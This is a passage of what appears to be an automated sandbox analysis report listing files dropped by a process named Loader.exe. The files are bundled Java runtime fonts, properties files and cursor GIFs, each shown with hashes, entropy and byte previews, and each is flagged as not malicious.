                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):344908
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.939775499317555
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                                                                                                                                                                                                                                                                                              MD5:630A6FA16C414F3DE6110E46717AAD53
                                                                                                                                                                                                                                                                                                              SHA1:5D7ED564791C900A8786936930BA99385653139C
                                                                                                                                                                                                                                                                                                              SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                                                                                                                                                                                                                                                                                              SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........pLTSHN..U..=....~OS/2...S.......Vcmap..tO...T....cvt =|t>.......tfpgm..1....`....glyf.J.........Jhdmx]......D....head.WD...h...6hhea.j.........$hmtxW.6|........loca............maxp......4.... nameJO....4....rpost..g...8,..M.prep.].O.......T.............).......).....d. .............."....`........B&H..@. ...D.]...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................|...........~.............&.u.z.~.......................O.\.....................:.R.m.......... . . . . " & 0 : D t .!"!&!.".%....................3.b.r.t....... .............&.t.z.~.........................Q.^...................!.@.`.p........ . . . . & 0 9 D t .!"!&!.".%....................3.^.p.t.v.........W.......M......................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaSansDemiBold.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):317896
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.869598480468745
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                                                                                                                                                                                                                                                                                              MD5:5DD099908B722236AA0C0047C56E5AF2
                                                                                                                                                                                                                                                                                                              SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                                                                                                                                                                                                                                                                                              SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                                                                                                                                                                                                                                                                                              SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........pLTSH_R.a........OS/2...........Vcmapz.$L.......Zcvt ...y...8...hfpgm..1.........glyf......\....hdmx..0A.......hhead..&..:H...6hhea......:....$hmtx.,Z:..:.....loca.~'...T.....maxp......n.... name..=%..n....Kpost$.#...s$..[?prep......d...a..........................................)........2'............'........ ....................".".............0.%...............%...........)....................... ......0 ..............................) ) ) ) ...........................................2.2.2.2.).......................................................'"'"'"1....0.........................................................................................................'.....'...........)..,...&,....#............./&.....&.&.$.....$...$........'....... ....)...."...,.......+.....'....).,.....-)..)................... ..."..................,.........(.........,........................../..2.......+.........,.#) .....................+..).........0......+...............,.,.,......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaSansRegular.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):698236
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.892888039120645
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                                                                                                                                                                                                                                                                                              MD5:B75309B925371B38997DF1B25C1EA508
                                                                                                                                                                                                                                                                                                              SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                                                                                                                                                                                                                                                                                              SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                                                                                                                                                                                                                                                                                              SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........... GDEF..|.......GPOS.......L...HGSUB.f.........LTSH...........uOS/2.#GQ...,...Vcmap..4........4cvt .y..........fpgm.!&.........glyf. ..........hdmx...M...(...\head..........6hhea...........$hmtx.S........-.loca'.c......-.maxp...Y....... nameW..r........post.&-.........prep.........................).......).....d. ...................{........B&H..@. ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..........................................................................................................".....".~...............E.u.z.~.......................O.\...............................:.R.m.............9.M.T.p.:.[.... . F p . . .!8!.!.".#.#.#!$i%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&.&.&.&.&<&@&B&`&c&f&k'.'.'''K'M'R'V'^'g'.'.'................ .3.....6.<.>.A.D.N.b.r.t......... .........P.......t.z.~

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaTypewriterBold.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):234068
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.901545053424004
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                                                                                                                                                                                                                                                                                              MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                                                                                                                                                                                                                                                                                              SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                                                                                                                                                                                                                                                                                              SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
                                                                                                                                                                                                                                                                                                              SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........POS/2..........VcmapW......4....cvt .M/.........fpgm..1.........glyf|......@....head.c....L...6hhea...........$hmtx.e.........tloca..h..."....xmaxp......7.... name......7.....post1..%..;h..I.prep.......4... .............3.......3...1.f................+...x.........B&H.. . ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a....................................................................................................................................x...........~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k...................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?.... . . . &

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaTypewriterRegular.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):242700
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.936925430880877
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                                                                                                                                                                                                                                                                                              MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                                                                                                                                                                                                                                                                                              SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                                                                                                                                                                                                                                                                                              SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                                                                                                                                                                                                                                                                                              SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........POS/2...s.......`cmap..Rh...<....cvt m......@...<fpgm..1....|....glyf..;}...8....head.,j..2L...6hhea......2....$hmtx.....2.....loca.PB...H(....maxp.z....].... namex.R...].....post...Q..ax..I.prep.UJ....\.................).......).....d. ..............{.............B&H..@. ...D.\...... ........=..... ......................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..................................................................................................................~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k.........................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\hijrah-config-umalqura.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14331
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.512673497574481
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:W6Zh/3dzz8XIrN2r1CdaqRWtHwBWgvw0Jy/ArUsJzu0HI:W6jhGIwxCdaqWQBWgvw0JyorBJzu0o
                                                                                                                                                                                                                                                                                                              MD5:6E378235FB49F30C9580686BA8A787AA
                                                                                                                                                                                                                                                                                                              SHA1:2FC76D9D615A35244133FC01AB7381BA49B0B149
                                                                                                                                                                                                                                                                                                              SHA-256:B4A0C0A98624C48A801D8EA071EC4A3D582826AC9637478814591BC6EA259D4A
                                                                                                                                                                                                                                                                                                              SHA-512:58558A1F8D9D3D6F0E21B1269313FD6AC9A80A93CC093A5E8CDEC495855FCD2FC95A6B54FE59E714E89D9274654BB9C1CD887B3FB9D4B9D9C50E5C5983C571B8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# This properties file defines a Hijrah calendar variant...#..# Fields:..#..# <version> ::= 'version' '=' <version string>..# <id> ::= 'id' '=' <id string>..# <type> ::= 'type' '=' <type string>..# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>..# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>..#..# version ... (Required)..#..# id ... (Required)..# Identifies the Java Chronology..#..# type ... (Required)..# Identifies the type of calendar in the standard calendar ID scheme..# iso-start ... (Required)..# Specifies the corresponding ISO date to the first Hijrah day..# in the defined range of dates..#..# year ... (Required)..# Number of days for each month of a Hijrah year..# * Each line defines a ye

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\i386\jvm.cfg

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):657
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.993355967240905
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:QcwmIzDpneoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoe9B7aEiwoXH3Eoe4Q:QhDpemaoXHIB5foMS1JUqf07f
                                                                                                                                                                                                                                                                                                              MD5:9FD47C1A487B79A12E90E7506469477B
                                                                                                                                                                                                                                                                                                              SHA1:7814DF0FF2EA1827C75DCD73844CA7F025998CC6
                                                                                                                                                                                                                                                                                                              SHA-256:A73AEA3074360CF62ADEDC0C82BC9C0C36C6A777C70DA6C544D0FBA7B2D8529E
                                                                                                                                                                                                                                                                                                              SHA-512:97B9D4C68AC4B534F86EFA9AF947763EE61AEE6086581D96CBF7B3DBD6FD5D9DB4B4D16772DCE6F347B44085CEF8A6EA3BFD3B84FBD9D4EF763CEF39255FBCE3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# List of JVMs that can be used as an option to java, javac, etc...# Order is important -- first in this list is the default JVM...# NOTE that this both this file and its format are UNSUPPORTED and..# WILL GO AWAY in a future release...#..# You may also select a JVM in an arbitrary location with the..# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported..# and may not be available in a future release...#..-client KNOWN..-server KNOWN..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\cursors.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1320
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.02145006262851
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:n3lG0Bf4dJ0qEAmG620WKG0WBph8T2AGjGg0kz8lrbfOi7:3E0Bf4qrzrlWzy+ckUfP
                                                                                                                                                                                                                                                                                                              MD5:01B94C63BD5E6D094E84FF3AD640FFBF
                                                                                                                                                                                                                                                                                                              SHA1:5570F355456250B1EC902375B0257584DB2360AE
                                                                                                                                                                                                                                                                                                              SHA-256:52845DEB58038B4375C30B75DD2053726872758C96597C7CC5D6CEF11F42A2BA
                                                                                                                                                                                                                                                                                                              SHA-512:816BE2271CF3ECF10EE40E24A288CE302B2810010BEF76EFC0CE5746591955921B70F19005335F485D61A7B216DCCE0B06750831720DD426D07709154D5FAC7A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..#..# Cursors Properties file..#..# Names GIF89 sources for Custom Cursors and their associated HotSpots..#..# Note: the syntax of the property name is significant and is parsed..# by java.awt.Cursor..#..# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>..# Cursor.<name>.<geom>.HotSpot=<x>,<y>..#. Cursor.<name>.<geom>.Name=<localized name>..#..Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif..Cursor.CopyDrop.32x32.HotSpot=0,0..Cursor.CopyDrop.32x32.Name=CopyDrop32x32..#..Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif..Cursor.MoveDrop.32x32.HotSpot=0,0..Cursor.MoveDrop.32x32.Name=MoveDrop32x32..#..Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif..Cursor.LinkDrop.32x32.HotSpot=0,0..Cursor.LinkDrop.32x32.Name=LinkDrop32x32..#..Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif..Cursor.CopyNoDrop.32x32.HotSpot=6,2..Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32..#..Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif..Cursor.MoveNoDrop.32x32.Ho

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\invalid32x32.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                                                                                              MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                                                                                              SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                                                                                              SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                                                                                              SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\win32_CopyDrop32x32.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.347455736310776
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                                                                                                                                                                                                                                                                                              MD5:89CDF623E11AAF0407328FD3ADA32C07
                                                                                                                                                                                                                                                                                                              SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                                                                                                                                                                                                                                                                                              SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                                                                                                                                                                                                                                                                                              SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.. ................!.......,...... ...vL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.. V..9'......f.T....w.xW.B.....P..;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\win32_CopyNoDrop32x32.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                                                                                              MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                                                                                              SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                                                                                              SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                                                                                              SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\win32_LinkDrop32x32.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):168
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.465243369905675
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                                                                                                                                                                                                                                                                                              MD5:694A59EFDE0648F49FA448A46C4D8948
                                                                                                                                                                                                                                                                                                              SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                                                                                                                                                                                                                                                                                              SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                                                                                                                                                                                                                                                                                              SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.. ................!.......,...... ...yL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.6.'.....`1]......u.Q.r.V..C......f.P..;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\win32_LinkNoDrop32x32.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                                                                                              MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                                                                                              SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                                                                                              SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                                                                                              SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\win32_MoveDrop32x32.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):147
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.147949937659802
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                                                                                                                                                                                                                                                                                              MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                                                                                                                                                                                                                                                                                              SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                                                                                                                                                                                                                                                                                              SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                                                                                                                                                                                                                                                                                              SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.. ................!.......,...... ...dL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj.....-.kj..m.....X,&.......S..;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\images\cursors\win32_MoveNoDrop32x32.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                                                                                              MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                                                                                              SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                                                                                              SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
